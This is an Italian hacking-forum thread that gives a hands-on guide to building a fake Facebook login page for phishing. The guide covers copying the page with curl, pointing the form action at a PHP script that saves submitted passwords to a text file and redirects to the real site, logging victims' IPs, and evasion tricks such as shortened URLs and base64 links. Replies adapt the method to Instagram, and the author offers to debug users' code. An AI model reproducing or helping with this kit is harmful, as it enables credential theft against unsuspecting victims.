Guida Creare fake login manualmente

Stato
Discussione chiusa ad ulteriori risposte.

Gorate

Utente Emerald
13 Novembre 2016
1,384
42
478
529
Perche' nasce questa guida:
Da poco, c'e' stato un fluente aumento di domande riguardanti i fake login, o meglio copie [il piu' possibile simili agli originali] field di login che servono per condurre attacchi di phishing.
Cio' che mi spinge a scrivere questa guida, non e' tanto il "come fare" [ce ne sono di modi migliori di questo], ma far capire come cio' che fanno i tool automatizzati e gia' sfornati [che possiamo trovare in kali o parrot], lavorano come un umano in modo intelligente, e per tanto non c'e' bisogno esclusivamente di questi per poter creare un fake login.
Come procederemo:
Il tutto sara' provato sul sito di cui piu' si parla riguardo a metodi per ottenere pass di account e credenziali: facebook .
Questa guida e' a solo scopo informativo e non mi assumo nessuna responsabilita' dell uso che ne farete. Detto cio' , cominciamo !!! :

Requisiti:
  • Un computer con installato un server [ove hosteremo il tutto]
  • Minima conoscenza di come funga un login
  • Blocco note
  • Terminale [con il quale copieremo il codice html della pagina]
  • ed utlimo ma non per importanza: un cervello funzionante :D
Cominciamo:
In primis dobbiamo ottenere il codice html del sito [nel nostro caso facebook]; Per fare cio' ci sono 2 modi:
  1. Copiare manualmente il tutto dal pannello developer tool del browser al quale potete accedere andando su "opzioni" [spesso identificate come 3 quadratini] > developer tool > elements
    upload_2017-9-29_15-42-57.png
    cosi' facend, dovrete cliccare poi sul tag <head> e mouse destro>edit as html> copy all> salvare il tutto in un file .html
  2. Aprire il terminale e digitare il seguente comando:
    Bash:
     curl -q https://www.facebook.com/login.php > facebook.html
Dopo aver fatto cio' , otteremmo una cosa simile a questo:
upload_2017-9-29_15-58-9.png
, ma se cliccherete sull icona in alto a sinistra, o su login, verrete rimandati alla pagina principale di facebbok, mentre noi vogliamo salvare le credenziali immesse in un file, e solo dopo rimandare alla pagina principale di facebook ...... Dobbiamo quindi modificare il codice nel seguente modo:
aprite il file facebook.html [con il codice che avete ottenuto con uno dei 2 passaggi di sopra] e cercate il seguente testo che sara' quello dal quale cominciare a modificare:

Codice:
Accedi a Facebook</span></div><div class="login_form_container"><form id="login_form" action="

Cosi' facendo potrete ottenere l' action predefinita di facebook, che non e' altro che un redirect alla pagina /login.php [vedete in foto quello sottolineato in rosso]:
upload_2017-9-29_16-4-39.png
,proprio il testo sottolineato in rosso, e' quello che ora dobbiamo andare a modificare;
Al posto di:
Codice:
/login.php?login_attempt=1&amp;lwv=100
inserite l url del vostro server che conterra' il seguente script php che e' di per se il cuore di questa operazione:
copiate quindi il seguente codice:
Codice:
<?php $file = 'credential.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=https://login.facebook.com/login.php" />
e salvate il tutto nel file post.php.
Uppate ora il file nel vostro server [nel mio caso xampp] e ottenete cosi' il suo url che dovrete sostituire nel file html:
upload_2017-9-29_16-11-2.png
ora avete pronto il tutto: uppate anche la pagina in html nel server come index.html in una cartella non sospetta, e attendete che la vittima inserisca il tutto: se tutto va bene dovreste arrivare a qualcosa del genere:
upload_2017-9-29_16-27-3.png
, come potete vedere il tutto funge alla perfezione, e possiamo visionare in chiaro sia la pass che la mail........alla fine della sovrascrittura del file inoltre, lo script .php rimanda alla vera pagina del login di facebook, facebdo sembrare tutto un banale errore........o forse no ??!

Piccole note:
Per fare una cosa del genere in remoto, dovete aver forwardato il server, inoltre un utente leggermente sveglio .... vedrebbe che l url non e' quello del solito login, quindi mandate sempre tramite url shortato.
Una piccola raccomandazione: non uppate cio' su siti come altervista or other, questo perche' il sito dopo 30 minuti sara' dichiarato inagibile e pericoloso:
upload_2017-9-29_19-56-24.png
. Spero la guida vi sia piaciuta :figo::D
Ma soprattutto, non fate i :lamer: : non otterrete nulla eccetto che una bella denuncia se vi scoprono !!, cosa piuttosto semplice perche' basta vedere l url alterato ...... e analizzare il codice della pagina:
upload_2017-9-29_16-34-41.png


PS: Nel post.php, prima di redirectare alla pagina vera e propria dopo aver sovrascritto le credenziali, potreste anche ottenere molte piu' info sulla vittima [ad esempio browser,hostname, localita' [approssimata] e sistema operativo attraverso un semplice metodo:
Andate sul sito http://blasze.com o su https://iplogger.com/ e create un url che redirecti alla pagina facebook.com dopo aver catturato le info sulla vittima; Sostituie quindi nel file post.php, l' url facebook.com con l' url che verra' generato poi procedete con il resto ...... appena la vittima premera' login, verra' redirectata all iplogger e poi al sito voluto, lasciando cosi' anche piu' informazioni su di se !!!
Il codice interno allo script post.php dovrebbe essere simile a :
PHP:
<?php $file = 'credential.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http//www.iplogger.com/....[dovrete mettere l' url generato]" />

upload_2017-10-14_14-59-53.png


Sotto richiesta, allego inoltre il file contenente tutti i file usati nel tutorial [come li vedete nella release];
NB: Nel file sono settati come nella cartella localhost/fakeloginfacebook/ [usando xampp su win...], quindi bisognera' modificare, come potete seguire dalla release, l' indirizzo dell host contenente i file del fake login;
URL con allegato: https://ufile.io/tchj5
 
In caso uno non avesse un server dove dovrebbe caricare i file visto che altervista dopo 30 minuti blocca i file? @Gorate
Teoricamente tutti potrebbero forwardare il proprio router, installare apache/xampp or other e uppare rendendo il proprio dispositivo raggiungibile dall esterno come un sito web [magari usi servizi come no-ip per rendere la conn stabile e non dinamica calcolando cosi' un hostname automaticamente]. Se pero' non vuoi fare cio', la cosa migliore sarebbe quella di uppare solo lo script php [che non viene rilevato come malevolo o phising] e mandare il file .html alla vittima, in questo modo salva in locale, manda la richiesta al server con lo script, salva le credeniali e hai risolto ....... oppure puoi provare mandando come link il corrispettivo in base64 [dubito non restino perplessi per aprirlo], ma almeno non fai salvare nulla e succede la stessa cosa che succederebbe mandandogli il file [con il solo fatto che il file se lo apre lo vede in chiaro], mentre per comprendere bene base64 [e sapere che e' tale], devi saper gia' qualcosina in piu' ...., quindi un utente inesperto potrebbe cascarci
 
La guida dovresti renderla più chiara e specifica, la trovo abbastanza confusa. Se metti un allegato dove possono scaricarlo e vedere al loro interno dove hai modificato il tutto, sarebbe perfetta. Si riesce a capire di più quando smanetti dentro il file piuttosto che crearlo e non concludere niente. Non l'ho provata, quindi non saprei nemmeno dirti se funziona. Deve essere più una cosa professionale e meno amatoriale :)
 
Ultima modifica:
La guida dovresti renderla più chiara e specifica, la trovo abbastanza confusa. Se metti un allegato dove possono scaricarlo e vedere al loro interno dove hai modificato il tutto, sarebbe perfetta. Si riesce a capire di più quando smanetti dentro il file piuttosto che crearlo e non concludere niente. Non l'ho provata, quindi non saprei nemmeno dirti se funziona. Deve essere più una cosa professionale e meno amatoriale :)
Chiarissimo, appena posso posto anche un url con i file in allegato cosi' potete analizzarne il contenuto [naturalmente inseriro' come host il localhost...] :)

EDIT: Ho aggiunto l' url e alcune indicazioni; Il file uppato e' zippato, e non sono presenti password..... non lascio la scansione virustotal perche' spero vi fidiate, in ogni modo se volete scnasionate poiche' non c'e' malware o altro nei file ....
 
  • Mi piace
Reazioni: DEDI
Ora la guida è completa e anche più semplice da capire. Potresti fare una guida su come crearlo per ogni tipo di sito, davvero utile per chi vuole capire qualcosa riguardo l'hacking per principianti :D
 
Ora la guida è completa e anche più semplice da capire. Potresti fare una guida su come crearlo per ogni tipo di sito, davvero utile per chi vuole capire qualcosa riguardo l'hacking per principianti :D
La guida prende come spunto il sito facebook perche' e' il target preferito in materia di social engineering e phising, ma volendo si potrebbe replicare lo stesso procedimento per ottenere il fake login di un altro sito ..... Poi naturalemnte e' ovvio che bisognera' trovare al interno del codice html il punto con il link da cambiare con la posizione del file post.php .......per intenderci l' unica parte che cambia per altri siti e' solo quella in cui devi sostituire al link originale quello falso del file post.php [naturalmente se provi a fare un fake login di instagram e' ovvio che dovrai sostituire il link "instagram.com" con "localhost/instagram.html" , e non con "localhost.facebook.com" [per fare un esempio]]. Poi bisogna cambiare nel file post.php l' url a cui redirectare [semplice semplice] e nel comando "curl ......>.......html", dovrai inserire l url del sito da ricopiare, ma tutto il resto rimane inalterato. Ad ogni modo, avere una base di html e' utilissimo per fare queste cose, e vi lascio un semplice trucco per trovare subito dove si trova [parlo nel codice html senza che lo dobbiate scorrere tutto ....] la parte che redirecta al sito authentication [che poi dovra' essere modificato con la locazione dello script post.php];
  1. Aprite i developer tools su chrome [io usero' questo browser per lo meno...]
  2. Andate sul sito [facebook.com]
  3. Cliccate sulla freccetta selezionatrice [vi riporta direttamente al codice html su cui cliccate] in alto a destra vicino alla scritta "Elements":
    upload_2017-10-14_14-30-21.png
  4. Dopoche' , potrete vedere l' azione che il form attua dopoaver inserito le credenziali:
    upload_2017-10-14_14-32-8.png
    HTML:
    <form id="login_form" action="/login.php?login_attempt=1&amp;lwv=100" method="post" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd" value="AVrFPg4V" autocomplete="off"><input type="hidden" autocomplete="off" id="error_box"><div id="loginform"><        Importante da notare la parte nel campo action [che sara' quela che dovete modificare]
  5. Copiate l' inzio di questo codice cosi' da sapere in quale punto dovete cercare la query action da modificare anche all interno del file .html dove senno' sarebbe da suicidarsi per cercarla ......
  6. Seguite il resto della guida
,Ma ritronando a quello che dicevi, come detto cambia solo un po' di codice e l' url, ma il resto rimane inalterato, quindi con un po' di tempo si acquisisce manualita' nel fare cose cosi'
 
:rofl::rofl:
c/p di brutto. scometto che non lo hai mai fatto IRL. poi, facendo un sondaggio su chi usa linux "veramente", di sicuro, manco l'un percento usano chrome.
sei più fake di GF VIP :asd:
A ciccio, io la guida l' ho fatta, mi sembra ben fornita e ben fatta, inoltre non ho copiato da nessuna parte [poi e' ovvio che bene o male e' questo il modo di farlo manualmente]. Per quanto riguarda quello che stai dicendo, io uso windows, e non me ne pento; Uso chrome e non me ne pento. Uso xampp come server e non me ne pento. Ho fatto gli screenshot nel momento in cui ho fatto il tutto, inoltre puoi ben notare anche che non sono obbligato da nessuno a farle, quindi mi piace e ci metto la passione e l' impegno per fare certe cose [so' che sono termini sconosciuti a te trollino bimbino]. Ad ogni modo non voglio nenache arrabbiarmici perche' non sai nemmeno cosa dici [per lo piu' senza prove o altro ......] quindi evita di postare per aumentare il numero dei messaggi, perche' fai figure pessime quando cerchi di scrivere da 15 enne fighetto "GF VIP IRL ...". Ad ogni modo, comunico a @DEDI che ho inserito un altra parte con dove poter loggare l ip di chi usa il fake login e ottenere info aggiuntive [che guarda un po' sono su chrome e win ....].
 
  • Mi piace
Reazioni: DEDI
questo vuol dire che hai capito solo il 15% della mia risposta..
basta che non ti "arrabbiartici"(?!?) :rofl:
Allora spiegami cosa vuoi dire ..........magari senza fare troppo il misterioso, poi mi sembrava abbastanza eslicito cio' a cui ti riferivi, ma dato che spesso sono avventato dimmi pure
 
non devo spiegare niente. a quanto pare, non sono il primo a dirti che non hai niente a che fare con questa sezione del forum. se ancora non hai capito, la colpa non è di sicuro la mia
1062975
 
@Stefano Novelli la guida è utile, l'ha aggiornata e non vedo dove sia il problema. Puoi cortesemente eliminare lo spam inutile? Grazie.
@Gorate scusa, solo che non sopporto chi sputa nell'operato degli altri. Ti ringrazio per avere aggiornato la guida!
 
@Stefano Novelli la guida è utile, l'ha aggiornata e non vedo dove sia il problema. Puoi cortesemente eliminare lo spam inutile? Grazie.
@Gorate scusa, solo che non sopporto chi sputa nell'operato degli altri. Ti ringrazio per avere aggiornato la guida!
Non si forniscono operazioni di moderazione on-demand lo sai, per queste cose o segnalazione o ticket di supporto
 
  • Mi piace
Reazioni: DEDI
Ho seguito la tua guida ed è stata molto utile, secondo te è possibile che questa procedura non funzioni con instagram? L'ho provata ma non mi riesce nonostante a primo impatto faccia tutto bene
 
Ho seguito la tua guida ed è stata molto utile, secondo te è possibile che questa procedura non funzioni con instagram? L'ho provata ma non mi riesce nonostante a primo impatto faccia tutto bene
In che senso non funge ??
Se il front [quindi font,immagini ecc....], sono caricate usando questa tecnica [nel senso che hai gia' provato e gli elementi grafici fungono], allora, il problema sicuramente e' o nel file post.php oppure nel forwarding [penso che infatti anche nell altra discussione che hai creato, il problema sia proprio questo].
Toglimi una curiosita' [lo so' : sono tardo ma non ho capito bene e voglio evitare di sparare cavolate]: con il metodo che avevi usato prima [setoolkit], ottenevi tutto ok in locale ma in remoto non ti appariva proprio nulla oppure in remoto fungeva ma non appaiono le immagini ??
Perche' se e' il primo caso, allora e' proprio un problema di rete e forwarding .
 
  • Mi piace
Reazioni: Jakelamotta
In pratica nel html di instagram manca la parte action=, questo mi ha portato a scaricare kali etc.
Con kali invece quando provo ad accedere non va in nessun caso, solo in alcuni momenti mi carica la pagina senza grafica, con un computer collegato alla stessa rete, la stessa pagina invece non viene proprio caricata da cellulare. Se cambio da instagram a facebook va tutto perfettamente sia da cellulare che da 2o computer windows(con qualche errore, tipo non manda sempre ciò che viene inserito nei campi utente e password).
Ho aperto la porta 80, che è quella cheusa kali nel mio caso.
Possibile che sia perchè uso kali da usb? O magari instagram ha qualche cosa di diverso, o sono super nabbo io
 
In pratica nel html di instagram manca la parte action=, questo mi ha portato a scaricare kali etc.
Con kali invece quando provo ad accedere non va in nessun caso, solo in alcuni momenti mi carica la pagina senza grafica, con un computer collegato alla stessa rete, la stessa pagina invece non viene proprio caricata da cellulare. Se cambio da instagram a facebook va tutto perfettamente sia da cellulare che da 2o computer windows(con qualche errore, tipo non manda sempre ciò che viene inserito nei campi utente e password).
Ho aperto la porta 80, che è quella cheusa kali nel mio caso.
Possibile che sia perchè uso kali da usb? O magari instagram ha qualche cosa di diverso, o sono super nabbo io
Mandami il codice che hai, cosi' provo a sistemarlo e ti faccio sapere.
Non riesco a capire il perche' , comunque se me lo passi appena ho un po' di tempo te lo patcho e provo, cosi' vediamo se e' un problema di rete e forwarding o semplicemente della pagina web. Madami il codice in privato :)

Che tu stia lavorando con kali su usb non influenza minimamente nulla, mentre instagram e facebook sono diversi nell html, quindi bisogna modificarlo in modo diverso [penso che aggiungendo una semplice riga posso fare tutto, ma devo visionare il codice che hai, senno' non posso].
 
  • Mi piace
Reazioni: Jakelamotta
Ciao Gorate!
Questa guida è un po’ vecchia quindi penso sia il motivo per il quale non riesco a completarla...
nel momento in cui apro il file creato, non mi apre la pagina copiata ma apre una pagina completamente vuota
 
Stato
Discussione chiusa ad ulteriori risposte.